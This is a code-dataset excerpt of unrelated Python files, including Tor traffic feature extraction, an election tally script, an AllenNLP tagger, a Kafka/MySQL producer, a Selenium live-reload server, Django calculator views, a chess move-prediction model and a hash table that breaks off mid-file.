would always equal the total length\n num_of_out_pkts = int(np.sum(np.array(self.total_cell) == 1))\n num_of_in_pkts = int(np.sum(np.array(self.total_cell) == -1))\n\n perc_out = num_of_out_pkts / float(num_of_total_pkts)\n perc_in = num_of_in_pkts / float(num_of_total_pkts)\n\n duration = self.total_time_list[-1] - self.total_time_list[0]\n\n pkt_per_sec = num_of_total_pkts / duration\n out_pkt_per_sec = num_of_out_pkts / duration\n in_pkt_per_sec = num_of_in_pkts / duration\n\n bytes_per_sec = np.sum(list(map(abs, self.total_cell))) / duration\n out_bytes_per_sec = np.sum(np.array(self.total_cell) == 1) / duration\n in_bytes_per_sec = abs(np.sum(np.array(self.total_cell) == -1)) / duration\n\n return num_of_total_pkts, num_of_out_pkts, num_of_in_pkts, duration, pkt_per_sec, out_pkt_per_sec, in_pkt_per_sec, bytes_per_sec, out_bytes_per_sec, in_bytes_per_sec\n\n def getFeature(self):\n\n mean_C, std_C, var_C, skew_C = self.getCellLength()\n\n minIat, maxIat, meanIat, medianIat, stdIat, varIat, fquanIat, lquanIat, skewIat, minOIat, maxOIat, meanOIat, medianOIat, stdOIat, varOIat, fquanOIat, lquanOIat, skewOIat, minIIat, maxIIat, meanIIat, medianIIat, stdIIat, varIIat, fquanIIat, lquanIIat, skewIIat = self.getCellIAT()\n\n max_B, mean_B, median_B, std_B, var_B, fquan_B, lquan_B, skew_B, \\\n max_OB, mean_OB, median_OB, std_OB, var_OB, fquan_OB, lquan_OB, skew_OB, \\\n max_IB, mean_IB, median_IB, std_IB, var_IB, fquan_IB, lquan_IB, skew_IB = self.getCellBurst() # len_IB, var_IB len_OB, len_B\n\n # f30_len_B\n f30_max_B, f30_mean_B, f30_median_B, f30_std_B, f30_var_B, f30_fquan_B, f30_lquan_B, f30_skew_B, \\\n f30_min_OB, f30_max_OB, f30_mean_OB, f30_median_OB, f30_std_OB, f30_var_OB, f30_fquan_OB, f30_lquan_OB, f30_skew_OB, \\\n f30_min_IB, f30_max_IB, f30_mean_IB, f30_median_IB, f30_std_IB, f30_var_IB, f30_fquan_IB, f30_lquan_IB, f30_skew_IB = self.get30CellBurst()\n\n incoming_preposition, len_incoming_preposition = self.getCellPreposition()\n\n max_in_o, mean_in_o, median_in_o, std_in_o, var_in_o, fquan_in_o, lquan_in_o, skew_in_o, \\\n max_out_o, mean_out_o, median_out_o, std_out_o, var_out_o, fquan_out_o, lquan_out_o, skew_out_o = self.getCellOrdering()\n\n max_O_conc, mean_O_conc, median_O_conc, std_O_conc, var_O_conc, fquan_O_conc, lauqn_O_conc, skew_O_conc = 
self.getCellConcentration() # len_O_conc\n\n f30In, f30Out, l30In, l30Out, percf30In, percf30Out, percl30In, percl30Out = self.getFirstLast30Cell()\n\n ntp, nop, nip, dura, pps, opps, ipps, bps, obps, ibps = self.getGeneralInformation() # nip, pco\n\n feature_array = [\n mean_C, std_C, var_C, skew_C, # 0, 1, 2, 3\n\n minIat, maxIat, meanIat, medianIat, stdIat, varIat, fquanIat, lquanIat, skewIat, # 4-12\n minOIat, maxOIat, meanOIat, medianOIat, stdOIat, varOIat, fquanOIat, lquanOIat, skewOIat, # 13-21\n minIIat, maxIIat, meanIIat, medianIIat, stdIIat, varIIat, fquanIIat, lquanIIat, skewIIat, # 22-30\n\n max_B, mean_B, median_B, std_B, var_B, fquan_B, lquan_B, skew_B, # 31-38\n max_OB, mean_OB, median_OB, std_OB, var_OB, fquan_OB, lquan_OB, skew_OB, # 39-46\n max_IB, mean_IB, median_IB, std_IB, var_IB, fquan_IB, lquan_IB, skew_IB, # 47-54\n\n f30_max_B, f30_mean_B, f30_median_B, f30_std_B, f30_var_B, f30_fquan_B, f30_lquan_B, f30_skew_B, # 55-62\n f30_min_OB, f30_max_OB, f30_mean_OB, f30_median_OB, f30_std_OB, f30_var_OB, f30_fquan_OB, f30_lquan_OB,\n f30_skew_OB, # 63-71\n f30_min_IB, f30_max_IB, f30_mean_IB, f30_median_IB, f30_std_IB, f30_var_IB, f30_fquan_IB, f30_lquan_IB,\n f30_skew_IB, # 72-80\n\n incoming_preposition, len_incoming_preposition, # 81-82\n\n max_in_o, mean_in_o, median_in_o, std_in_o, var_in_o, fquan_in_o, lquan_in_o, skew_in_o, # 83-90\n max_out_o, mean_out_o, median_out_o, std_out_o, var_out_o, fquan_out_o, lquan_out_o, skew_out_o, # 91-98\n\n max_O_conc, mean_O_conc, median_O_conc, std_O_conc, var_O_conc, fquan_O_conc, lauqn_O_conc, skew_O_conc,\n # 99-106\n\n f30In, f30Out, l30In, l30Out, percf30In, percf30Out, percl30In, percl30Out, # 107-114\n\n ntp, nop, nip, dura, pps, opps, ipps, bps, obps, ibps # 115-124\n ]\n\n return feature_array","sub_path":"TorNetwork/IDAPreprocess/packet_parser.py","file_name":"packet_parser.py","file_ext":"py","file_size_in_byte":14404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"542611571","text":"# coding: utf-8\n\nimport datetime\n\nimport matplotlib.pyplot as plt\n\nimport jira\nimport util\n\n\nif __name__ == \"__main__\":\n now = datetime.datetime.now()\n start_str = (now - datetime.timedelta(days=90)).strftime(\"%Y-%m-%d\")\n end_str = now.strftime(\"%Y-%m-%d\")\n query = (\"due >= {} AND due <= {} AND assignee in (currentUser()) \"\n \"AND status = Done ORDER BY due ASC\").format(start_str, end_str)\n issues = jira.search(query)\n plt.plot(\n range(-90, 0),\n util.get_cumlative_time_estimate(\n issues, range(-90, 0), \"timeoriginalestimate\"\n ),\n label=\"time original estimate\"\n )\n plt.plot(\n range(-90, 0),\n util.get_cumlative_time_estimate(\n issues, range(-90, 0), \"timespent\"\n ),\n label=\"time spent\"\n )\n plt.legend(loc=\"upper left\")\n plt.xlabel(\"days\")\n plt.ylabel(\"times (hours)\")\n plt.show()\n","sub_path":"show_time_estimate_accuracy.py","file_name":"show_time_estimate_accuracy.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"306883180","text":"# This program reads in the results from the following five counties:\r\n# Bamoo, Marsh, Queen, Raffah and Trandee.\r\n# Results are summarized into totals results for the election.\r\n\r\nimport csv\r\n\r\n# Initialize the variables\r\n\r\ncandidate = \"none\"\r\ntotal_votes = 0\r\ntotal_correy = 0\r\ntotal_khan = 0\r\ntotal_li = 0\r\ntotal_otooley = 0\r\ncorrey_pct = 0\r\nkhan_pct = 0\r\nli_pct = 
0\r\notooley_pct = 0\r\nmax = 0\r\nwinner = \"none\"\r\n\r\n\r\n# Create the lists for the election.\r\n# The candidate portion will need to be updated for each election\r\n\r\n\r\ncandidate_list = [] # Stores the candidate names\r\nvote_pct_list = [] # Stores the percentage of votes for candidates\r\nvote_total_list = [] # Stores the total votes for candidates\r\nelection_dict = {} # Dictionary which stores the election results by candidate\r\n\r\n\r\n\r\npoll_txt = \"poll_results.txt\" # File that holds all the election data\r\n\r\n\r\n# Main program\r\n\r\nwith open(poll_txt, 'r') as csvfile:\r\n\r\n    csvreader = csv.reader(csvfile, delimiter = \",\")\r\n\r\n    csvheader = next(csvreader)\r\n\r\n    # Loop through the file and calculate the total votes for each candidate\r\n    for record in csvreader: \r\n\r\n        candidate = record[2]\r\n\r\n        total_votes += 1\r\n\r\n        if candidate == \"Correy\": total_correy += 1 \r\n        if candidate == \"Khan\": total_khan += 1\r\n        if candidate == \"Li\": total_li += 1\r\n        if candidate == \"O'Tooley\": total_otooley += 1\r\n\r\n# The following code determines who the winner is\r\n# (each candidate is compared against the running maximum in turn)\r\n\r\nmax = total_correy\r\nwinner = \"Correy\"\r\nif total_khan > max:\r\n    max = total_khan\r\n    winner = \"Khan\"\r\nif total_li > max:\r\n    max = total_li\r\n    winner = \"Li\"\r\nif total_otooley > max:\r\n    max = total_otooley\r\n    winner = \"O'Tooley\"\r\n\r\n\r\n# This code calculates the percentage for each candidate\r\n\r\ncorrey_pct = round((total_correy/total_votes),2)\r\nkhan_pct = round((total_khan/total_votes),2)\r\nli_pct = round((total_li/total_votes),2)\r\notooley_pct = round((total_otooley/total_votes),2)\r\n\r\n# Creating the three lists to be used to create the dictionary of election results\r\n\r\ncandidate_list.append(\"Correy\")\r\ncandidate_list.append(\"Khan\")\r\ncandidate_list.append(\"Li\")\r\ncandidate_list.append(\"O'Tooley\")\r\n\r\nvote_pct_list.append(correy_pct)\r\nvote_pct_list.append(khan_pct)\r\nvote_pct_list.append(li_pct)\r\nvote_pct_list.append(otooley_pct)\r\n\r\nvote_total_list.append(total_correy)\r\nvote_total_list.append(total_khan)\r\nvote_total_list.append(total_li)\r\nvote_total_list.append(total_otooley)\r\n\r\n# Creation of the dictionary of election results\r\n\r\nelection_dict = dict(zip(candidate_list, zip(vote_pct_list, vote_total_list)))\r\n\r\n# Print out the election results\r\n\r\nprint(\" Election Results\")\r\nprint(\"-\" * 25,'\\n')\r\nprint(\" Total Votes: \" + str(total_votes))\r\nprint(\"-\" * 25,'\\n')\r\nfor k,vv in sorted(election_dict.items(), key=lambda p:p[1], reverse=True):\r\n    print(\"{} : {}\".format(k,vv))\r\nprint(\"-\" * 25,'\\n')\r\nprint(\" Winner: \" + winner)\r\n\r\n# Save the dictionary of election results as a text file \r\n\r\noutputfile = open(\"election_dict.txt\",\"w\")\r\noutputfile.write( str(election_dict) )\r\noutputfile.close()","sub_path":"PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"283066247","text":"# Write a function that counts the digits and letters in a sentence entered via input.\n# Example input: hello world! 
123\n# Output:\n# LETTERS: 10\n# DIGITS: 3\n\ndef num_letters_and_numbers():\n    string = input('Enter anything: ')\n    letters = 0\n    nums = 0\n    for c in string:\n        # check if the char is an alpha char or a digit\n        if c.isalpha():\n            letters += 1\n        elif c.isdigit():\n            nums += 1\n\n    return f\"\"\"Number of letters in given string is : {letters}\nNumber of digits in given string is : {nums}\n\"\"\"\n\n\nprint(num_letters_and_numbers())\n","sub_path":"Soru5.py","file_name":"Soru5.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"350710590","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 5 18:05:27 2019\n\n@author: raghav\n\"\"\"\n\nfrom typing import Dict, Optional, List, Any\n\nimport numpy\nfrom overrides import overrides\nimport torch\nfrom torch.nn.modules.linear import Linear\nimport torch.nn.functional as F\n\nfrom allennlp.common.checks import check_dimensions_match, ConfigurationError\nfrom allennlp.data import Vocabulary\nfrom allennlp.modules import Seq2SeqEncoder, TimeDistributed, TextFieldEmbedder\nfrom allennlp.models.model import Model\nfrom allennlp.nn import InitializerApplicator, RegularizerApplicator\nfrom allennlp.nn.util import get_text_field_mask, sequence_cross_entropy_with_logits\nfrom allennlp.training.metrics import CategoricalAccuracy, SpanBasedF1Measure\n\n@Model.register(\"chunk_simple_tagger\")\nclass ChunkSimpleTagger(Model):\n\n    def __init__(self, vocab: Vocabulary,\n                 text_field_embedder: TextFieldEmbedder,\n                 encoder: Seq2SeqEncoder,\n                 calculate_span_f1: bool = None,\n                 label_encoding: Optional[str] = None,\n                 label_namespace: str = None,\n                 verbose_metrics: bool = False,\n                 initializer: InitializerApplicator = InitializerApplicator(),\n                 regularizer: Optional[RegularizerApplicator] = None) -> None:\n        super(ChunkSimpleTagger, self).__init__(vocab, regularizer)\n\n        self.label_namespace = label_namespace\n        self.text_field_embedder = text_field_embedder\n        self.num_classes = self.vocab.get_vocab_size(label_namespace)\n        self.encoder = encoder\n        self._verbose_metrics = verbose_metrics\n        self.tag_projection_layer = TimeDistributed(Linear(self.encoder.get_output_dim(),\n                                                           self.num_classes))\n\n        check_dimensions_match(text_field_embedder.get_output_dim(), encoder.get_input_dim(),\n                               \"text field embedding dim\", \"encoder input dim\")\n\n        # We keep calculate_span_f1 as a constructor argument for API consistency with\n        # the CrfTagger, even though it is redundant in this class\n        # (label_encoding serves the same purpose).\n        if calculate_span_f1 and not label_encoding:\n            raise ConfigurationError(\"calculate_span_f1 is True, but \"\n                                     \"no label_encoding was specified.\")\n        self.metrics = {\n            \"accuracy\": CategoricalAccuracy(),\n            \"accuracy3\": CategoricalAccuracy(top_k=3)\n        }\n\n        if calculate_span_f1 or label_encoding:\n            self._f1_metric = SpanBasedF1Measure(vocab,\n                                                 tag_namespace=label_namespace,\n                                                 label_encoding=label_encoding)\n        else:\n            self._f1_metric = None\n\n        initializer(self)\n\n    @overrides\n    def forward(self, # type: ignore\n                tokens: Dict[str, torch.LongTensor],\n                tags: torch.LongTensor = None,\n                metadata: List[Dict[str, Any]] = None) -> Dict[str, torch.Tensor]:\n        # pylint: disable=arguments-differ\n        embedded_text_input = self.text_field_embedder(tokens)\n        batch_size, sequence_length, _ = embedded_text_input.size()\n        mask = get_text_field_mask(tokens)\n        encoded_text = self.encoder(embedded_text_input, mask)\n\n        logits = 
self.tag_projection_layer(encoded_text)\n reshaped_log_probs = logits.view(-1, self.num_classes)\n class_probabilities = F.softmax(reshaped_log_probs, dim=-1).view([batch_size,\n sequence_length,\n self.num_classes])\n\n output_dict = {\"logits\": logits, \"class_probabilities\": class_probabilities}\n\n if tags is not None:\n loss = sequence_cross_entropy_with_logits(logits, tags, mask)\n for metric in self.metrics.values():\n metric(logits, tags, mask.float())\n if self._f1_metric is not None:\n self._f1_metric(logits, tags, mask.float())\n output_dict[\"loss\"] = loss\n\n if metadata is not None:\n output_dict[\"words\"] = [x[\"words\"] for x in metadata]\n return output_dict\n\n @overrides\n def decode(self, output_dict: Dict[str, torch.Tensor]) -> Dict[str, torch.Tensor]:\n \"\"\"\n Does a simple position-wise argmax over each token, converts indices to string labels, and\n adds a ``\"tags\"`` key to the dictionary with the result.\n \"\"\"\n all_predictions = output_dict['class_probabilities']\n all_predictions = all_predictions.cpu().data.numpy()\n if all_predictions.ndim == 3:\n predictions_list = [all_predictions[i] for i in range(all_predictions.shape[0])]\n else:\n predictions_list = [all_predictions]\n all_tags = []\n for predictions in predictions_list:\n argmax_indices = numpy.argmax(predictions, axis=-1)\n tags = [self.vocab.get_token_from_index(x, namespace=self.label_namespace)\n for x in argmax_indices]\n all_tags.append(tags)\n output_dict['tags'] = all_tags\n return output_dict\n\n @overrides\n def get_metrics(self, reset: bool = False) -> Dict[str, float]:\n metrics_to_return = {metric_name: metric.get_metric(reset) for\n metric_name, metric in self.metrics.items()}\n\n if self._f1_metric is not None:\n f1_dict = self._f1_metric.get_metric(reset=reset)\n if self._verbose_metrics:\n metrics_to_return.update(f1_dict)\n else:\n metrics_to_return.update({\n x: y for x, y in f1_dict.items() if\n \"overall\" in x})\n return metrics_to_return","sub_path":"setup/models/chunk_tagger.py","file_name":"chunk_tagger.py","file_ext":"py","file_size_in_byte":5923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"630926090","text":"## This function extracts a table from a PDF file and save it in a CSV file\n\nimport pdfplumber\nimport re\nfrom pandas import DataFrame\n\npath = 'sample1.pdf'\n\n\ndef PDFTabletoCSV(path):\n \n pdf = pdfplumber.open(path)\n \n for page in pdf.pages:\n #print(page.extract_text())\n for pdf_table in page.extract_tables():\n table = []\n cells = []\n for row in pdf_table:\n if not any(row):\n if any(cells):\n table.append(cells)\n cells = []\n elif all(row):\n if any(cells):\n table.append(cells)\n cells = []\n table.append(row)\n else:\n if len(cells) == 0:\n cells = row\n else:\n for i in range(len(row)):\n if row[i] is not None:\n cells[i] = row[i] if cells[i] is None else cells[i] + row[i]\n \n \n for row in table:\n print([re.sub('\\s+', '', cell) if cell is not None else None for cell in row])\n print('---------- Line Breaker ----------')\n \n \n pdf.close()\n \n df = DataFrame(table, columns = ['Education', '# of Employees'])\n df.to_csv('data.csv', mode='a', header = False)\n \n print(df)\n \n\n\n#df2 = DataFrame({\n # '# of Employees': [9,62,140,750,961]\n #}, index = ['Postgraduate', '4 Year College', 'Community College', \n #'High School or Less', 'Total']) \n 
\n\n\n\n","sub_path":"ExtractPDF/TableFromPDF.py","file_name":"TableFromPDF.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"32129680","text":"import argparse\nimport logging\nimport os\nimport json\nimport mysql\nfrom kafka import KafkaConsumer, KafkaProducer\nfrom mysql.connector import errorcode\n\nimport logging\nfrom cassandra.cqlengine import columns\nfrom cassandra.cqlengine.models import Model\nfrom cassandra.cluster import Cluster, BatchStatement\nfrom cassandra.query import SimpleStatement\n\nfrom kafka.client import KafkaClient\nfrom kafka.consumer import SimpleConsumer\nfrom cassandra.cluster import Cluster\nfrom cassandra.policies import DCAwareRoundRobinPolicy\nimport datetime\nimport time\n\nmysql_configs = {\n 'user': 'admin1',\n 'password': 'password',\n 'host': '127.0.0.1',\n 'database': 'aionv4',\n 'raise_on_warnings': True,\n}\n\ndef connect_to_mysql():\n try:\n conn = mysql.connector.connect(**mysql_configs)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n print(\"Something is wrong with your user name or password\")\n print(err)\n elif err.errno == errorcode.ER_BAD_DB_ERROR:\n print(\"Database does not exist\")\n else:\n print(err)\n return;\n else:\n return conn;\n\ndef get_blocks():\n conn = connect_to_mysql()\n if None != conn:\n cursor = conn.cursor()\n sql = \"SELECT * FROM block\"\n cursor.execute(sql)\n rows = cursor.fetchall()\n return rows;\n conn.close()\n\n\ndef send_produced_messages(messages_list):\n # return\n producer = KafkaProducer(bootstrap_servers='localhost:9092',api_version=(0, 10, 1),\n batch_size=16384)\n topic='aionv4_block'\n for message in messages_list:\n # print 'Sending message: %s' % message;\n # producer.send('test', b'%s' % message)\n # Block until a single message is sent (or timeout)\n future = producer.send(topic, json.dumps(message).encode('utf-8'))\n print(\"producer_block_block_number:{}\".format(message[1]))\n result = future.get(timeout=30)\n\n \n# SET UP PRODUCER\nlogger = logging.getLogger(__name__)\n\n\n# USE PRODUCEER\nproducer_list = list()\nrows = get_blocks()\n\nif producer_list is not None:\n for r in rows:\n producer_list.append(r)\n send_produced_messages(producer_list)","sub_path":"producer_block.py","file_name":"producer_block.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"499437810","text":"import pickle\nimport datetime as dt\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport chess\nimport torch\n\nfrom GameConverter import GameConverter\nfrom PositionConverter import PositionConverter\nfrom PositionHandler import PositionHandler\nfrom utils import read_pgn, clock, get_pos_time, get_time_used\n\n\nclass Player(object):\n def __init__(self, name=\"my\", default_time=1800):\n self.name = name\n self.DEF_TIME = default_time\n self.PRE_EPOCH = 1314835200\n\n\n def build_dataset(self, pgn, all=False):\n data = list()\n games = read_pgn(pgn)\n gconv = GameConverter()\n\n for game in games:\n my_color = gconv.get_my_color(game)\n headers = gconv.gen_header_tags(game)\n otb = headers.get(\"OTB\")\n game_date = headers.get(\"date\")\n if game_date is not None:\n es = dt.datetime.strptime(game_date, \"%Y.%m.%d\").timestamp()\n else:\n es = self.PRE_EPOCH\n time_init = headers.get(\"time_init\", self.DEF_TIME)\n time_inc = headers.get(\"time_inc\", 0)\n if 
np.isnan(time_inc):\n time_inc = 0\n board = chess.Board()\n for node in game.mainline():\n if all or (my_color is not None and board.turn == my_color):\n pos_time = get_pos_time(node, time_init)\n clock_time = clock(node.comment)\n time_used = get_time_used(pos_time, clock_time)\n\n uci_mv = node.move.uci()\n piece_mv = board.piece_at(\n chess.parse_square(uci_mv[:2])\n ).symbol()\n promote = uci_mv[-1] if len(uci_mv) > 4 else None\n\n data.append(\n (\n board.fen(),\n (uci_mv, piece_mv, promote),\n es,\n (otb, pos_time, clock_time, time_inc),\n )\n )\n\n board = node.board()\n\n with open(f'../data/{self.name}_position_move_dataset', 'wb') as f:\n pickle.dump(data, f)\n\n return data\n\n\n def infer(self, pgn, device):\n model = torch.load('./models/model_20230414.00.08.22')\n\n pconv = PositionConverter()\n phand = PositionHandler()\n\n games = read_pgn(pgn)\n gconv = GameConverter()\n\n for g_i, game in enumerate(games):\n my_color = gconv.get_my_color(game)\n headers = gconv.gen_header_tags(game)\n print(f\"\\n{headers}\")\n\n time_init = headers.get(\"time_init\")\n if time_init is None:\n time_init = self.DEF_TIME\n\n if my_color:\n move_num_syntax = '.'\n else:\n move_num_syntax = '...'\n\n losses = list()\n board = chess.Board()\n for node in game.mainline():\n if board.turn == my_color:\n pos_time = get_pos_time(node, time_init)\n tensor, gamestage = pconv.fen_to_tensor_gamestage(\n board.fen(), (pos_time / phand.SEC_HR)\n )\n\n legal_moves = [move.uci() for move in board.legal_moves]\n legal_moves = [\n (\n move,\n board.piece_at(\n chess.parse_square(move[:2])\n ).symbol(),\n move[-1] if len(move) > 4 else None\n )\n for move in legal_moves\n ]\n if board.fen().split()[1] == \"b\":\n legal_moves = [\n (\n phand.perform_move_color_mirror(move[0]),\n move[1],\n move[2]\n ) for move in legal_moves\n ]\n legal_move_y = [\n phand.gen_label(*move) for move in legal_moves\n ]\n legal_move_y = torch.tensor(legal_move_y).to(device)\n\n uci_mv = node.move.uci()\n piece_mv = board.piece_at(\n chess.parse_square(uci_mv[:2])\n ).symbol()\n promote = uci_mv[-1] if len(uci_mv) > 4 else None\n\n if board.fen().split()[1] == \"b\":\n uci_mv = phand.perform_move_color_mirror(uci_mv)\n\n tensor = tensor.reshape((1, *tensor.shape))\n tensor = torch.tensor(\n np.ascontiguousarray(tensor)\n ).to(device)\n logits = model(tensor)\n legal_logits = torch.gather(\n logits.view(-1), 0, legal_move_y\n )\n legal_move_pr = torch.softmax(legal_logits, 0)\n\n for i,move in enumerate(legal_moves):\n if uci_mv == move[0]:\n loss = -torch.log(legal_move_pr[i]).item()\n break\n\n losses.append(loss)\n\n if board.fen().split()[1] == \"b\":\n legal_moves = [\n (\n phand.perform_move_color_mirror(move[0]),\n move[1],\n move[2]\n ) for move in legal_moves\n ]\n move_pr = {\n mv[0]: float(legal_move_pr[i])\n for i,mv in enumerate(legal_moves)\n }\n move_pr = dict(\n sorted(\n move_pr.items(), key=lambda i: i[1], reverse=True\n )\n )\n move_pr = {k: round(v, 3) for k,v in move_pr.items()}\n move_num_str = ''.join(\n [\n str(board.fullmove_number),\n move_num_syntax,\n board.san(node.move)\n ]\n )\n print(move_num_str)\n print(move_pr)\n\n board = node.board()\n self.create_move_loss_fig(losses, title_suffix=str(g_i))\n print(np.mean(losses))\n print(np.std(losses))\n\n return ...\n\n\n def create_move_loss_fig(\n self,\n losses,\n out_path='./models/test_loss.png',\n title_suffix='',\n window=3,\n ):\n fig, ax = plt.subplots()\n\n ax.set_xlabel('Move Number')\n ax.set_ylabel('CE Loss')\n ax.set_title(\n f'Agent test 
mean last {window} losses\\n{title_suffix}'\n )\n\n from numpy.lib.stride_tricks import sliding_window_view\n window = min(window, len(losses))\n rolling = sliding_window_view(\n np.array(losses), window_shape=window\n ).mean(axis=1)\n n_episodes = rolling.shape[0] + window\n ax.plot(np.arange(window, n_episodes), rolling)\n\n plt.xticks(\n np.arange(\n window, n_episodes, max(1, int(round(n_episodes / 10)))\n )\n )\n\n split_out_path = out_path.split('.')\n title_suffix += dt.datetime.now().strftime(\"%Y%m%d.%H.%M.%S\")\n plt.savefig(f\".{split_out_path[1]}{title_suffix}.{split_out_path[-1]}\")\n\n return None\n","sub_path":"mlchess/Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":7723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"512561738","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 18 10:55:03 2017\n\n@author: lxr\n\"\"\"\n\nimport os,sys\nbase = 'test_singlepress/'\nos.mkdir(base)\n\nss = \"0123456789abcdefghijklmnopqrstuvwxyz\"\nfor i in ss:\n file_name = base+i\n os.mkdir(file_name)","sub_path":"DeepLearning/keras/genedirs_split.py","file_name":"genedirs_split.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"203291585","text":"import http.server as http, threading ,os,time,sys\n\nfrom selenium import webdriver\n\n\nclass handler(http.CGIHTTPRequestHandler):\n\tdef do_GET(self):\n\t\t\n\t\thandlerFile = HandlerFile()\n\t\thandlerFile.starts = 0\n\n\t\tif self.path.endswith((\".htm\",\".html\")):\n\t\t\tself.send_response(200) \n\t\t\tself.send_header('Content-type',\"text/html\") \n\t\t\tself.end_headers()\n\t\t\tif (os.path.exists(\".\"+self.path)):\n\t\t\t\tself.wfile.write(open(\".\"+self.path,\"rb\").read())\n\t\t\t\thandlerFile.file = self.path\n\t\t\t\thandlerFile.starts = 1\n\t\t\t\thandlerFile.start()\n\n\t\t\telse:\n\t\t\t\tself.wfile.write(b\"
Not Found Page\")\n\n\t\telif self.path.endswith(\".css\"):\n\t\t\tself.send_response(200) \n\t\t\tself.send_header('Content-type', 'text/css') \n\t\t\tself.end_headers()\n\t\t\tself.wfile.write( (open(self.path.strip(\"/\"),\"r\").read()).encode(\"u8\") )\n\n\n\t\telif self.path.endswith(\".js\"):\n\t\t\tself.send_response(200) \n\t\t\tself.send_header('Content-type', \"text/javascript\") \n\t\t\tself.end_headers()\n\t\t\tself.wfile.write( (open(self.path.strip(\"/\"),\"r\").read()).encode(\"u8\") )\n\n\n\nclass HandlerFile(threading.Thread):\n\tdef __init__(self):\n\t\tthreading.Thread.__init__(self)\n\t\t\n\t\t\n\tdef run(self):\n\t\tself.file = os.getcwd()+self.file\n\t\tif os.path.exists(self.file):\n\t\t\tSize_old = os.path.getsize(self.file)\n\t\t\twhile self.starts:\n\t\t\t\ttime.sleep(1)\n\t\t\t\tSize_new = os.path.getsize(self.file)\n\t\t\t\tif Size_old != Size_new :\n\t\t\t\t\ttry:\n\t\t\t\t\t\tdriver.refresh()\n\t\t\t\t\texcept:\n\t\t\t\t\t\ttime.sleep(5)\n\t\t\t\t\t\tdriver.refresh()\n\n\t\t\t\t\tbreak\n\n\nclass httpServer(threading.Thread):\n\tdef __init__(self,host,port):\n\t\tthreading.Thread.__init__(self)\n\t\tself.server = http.HTTPServer((host,port),handler)\n\n\tdef run(self):\n\t\tself.server.serve_forever()\t\n\n\t\t\nhost = \"127.0.0.1\"\nport = 800\nargv = sys.argv\ndrivers = {\n\t\"firefox\":webdriver.Firefox ,\n\t\"opera\" :webdriver.Opera ,\n\t\"ie\" :webdriver.Ie ,\n\t\"edge\" :webdriver.Edge ,\n\t\"safari\" :webdriver.Safari ,\n\t\"chrome\" :webdriver.Chrome\n}\ntry:\n\n\n\tif len(argv) < 2:\n\t\tprint(len(argv))\n\t\targv.append(\"chrome\")\n\n\tif drivers.get(argv[1].lower()):\n\t\tdriver = drivers.get(argv[1].lower())()\n\n\telse: sys.exit(\"No such %sDriver !!\"%(argv[1].capitalize()))\n\t\t\n\thttpServer(host,port).start()\n\n\tdriver.get(\"http://%s:%s/index.html\"%(host,port))\n\t\n\twhile True:\n\t\tpass\n\nexcept KeyboardInterrupt:\n\tos.kill(os.getpid(),15)","sub_path":"live.py","file_name":"live.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"275982233","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n# Create your views here.\n\ndef sumar(request, num1, num2):\n\tsuma = int(num1) + int(num2)\n\treturn HttpResponse(\"La suma de \"\n\t\t\t\t\t\t+ str(num1) + \" + \"\n\t\t\t\t\t\t+ str(num2) + \" es \"\n\t\t\t\t\t\t+ str(suma))\n\ndef restar(request, num1, num2):\n\tresta = int(num1) - int(num2)\n\treturn HttpResponse(\"La resta de \"\n\t\t\t\t\t\t+ str(num1) + \" - \"\n\t\t\t\t\t\t+ str(num2) + \" es \"\n\t\t\t\t\t\t+ str(resta))\n\ndef multiplicar(request, num1, num2):\n\tmultiplicacion = int(num1) * int(num2)\n\treturn HttpResponse(\"La multiplicacion de \"\n\t\t\t\t\t\t+ str(num1) + \" * \"\n\t\t\t\t\t\t+ str(num2) + \" es \"\n\t\t\t\t\t\t+ str(multiplicacion))\n\ndef dividir(request, num1, num2):\n\tdivision = int(num1) / int(num2)\n\treturn HttpResponse(\"La division de \"\n\t\t\t\t\t\t+ str(num1) + \" / \"\n\t\t\t\t\t\t+ str(num2) + \" es \"\n\t\t\t\t\t\t+ str(division))\n\ndef error(request):\n\treturn HttpResponse('Pagina no encontrada
')\n","sub_path":"calc/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"67988277","text":"import sys\nimport mmh3\n \nclass Item:\n\n def __init__(self, key):\n self.key = key\n \nclass HashTable:\n \n def __init__(self, size):\n self.count = 0\n self.table_size = size\n self.table = [[] for i in range(size)]\n \n def hashing(self, key):\n '''\n Used hash is MurmurHash (mmh3 2.2 module).\n '''\n\n return mmh3.hash(key) % self.table_size \n\n def insert(self, item):\n hash = self.hashing(item.key)\n\n for i, it in enumerate(self.table[hash]):\n if it.key == item.key:\n del self.table[hash][i]\n self.count -= 1\n self.table[hash].append(item)\n self.count += 1 \n \n def get(self, key):\n print (\"Getting item(s) with key '\" + key + \"'\")\n hash = self.hashing(key)\n for i, it in enumerate(self.table[hash]):\n if it.key == key:\n return self.table[hash]\n print (\" not in table.\") \n return 